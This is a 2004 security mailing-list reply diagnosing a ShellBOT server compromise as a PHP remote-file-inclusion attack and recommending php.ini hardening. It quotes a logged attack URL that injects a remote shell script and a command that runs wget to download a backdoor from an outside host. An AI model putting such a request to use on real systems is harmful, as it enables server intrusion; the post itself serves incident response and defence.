Security Incidents mailing list archives

Re: Systems compromised with ShellBOT perl script - part 2

From: "Chris Norton" <kicktd_list () hotmail com>
Date: Thu, 21 Oct 2004 11:53:08 -0500

This sounds like it may be a typical fopen()/include() PHP exploit as this
seems to be the motive for this group,
As seen from the very first post:

Kirby Angell wrote:

 Yesterday we noticed a funny looking Apache log entry.  It contained:

http://www.DOMAIN.com/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2

Where a remote php shell script file is used then the backdoor is uploaded
onto the server. This can be avoided by
setting the safe_mode setting in php.ini to on and disabled_functions: to
include exec, popen, and passthru.

--
Chris Norton
UAT Student Software Engineering Network Defense

Current thread:

Re: Systems compromised with ShellBOT perl script - part 2, (continued)
- Re: Systems compromised with ShellBOT perl script - part 2 Jeffrey Denton (Oct 20)
- Re: Systems compromised with ShellBOT perl script - part 2 Martin Mačok (Oct 20)
- Re: Systems compromised with ShellBOT perl script - part 2 Harry de Grote (Oct 20)
- Re: Systems compromised with ShellBOT perl script - part 2 Stephen J. Smoogen (Oct 20)
  - RE: Systems compromised with ShellBOT perl script - part 2 KEM Hosting (Oct 20)
  - Re: Systems compromised with ShellBOT perl script - part 2 Thomas Hochstein (Oct 21)
    - Re: Systems compromised with ShellBOT perl script - part 2 Paul Schmehl (Oct 22)
- RE: Systems compromised with ShellBOT perl script - part 2 KEM Hosting (Oct 20)
  - RE: Systems compromised with ShellBOT perl script - part 2 Poof (Oct 20)
- Re: Systems compromised with ShellBOT perl script - part 2 Dave (Oct 20)
  - Re: Systems compromised with ShellBOT perl script - part 2 Chris Norton (Oct 22)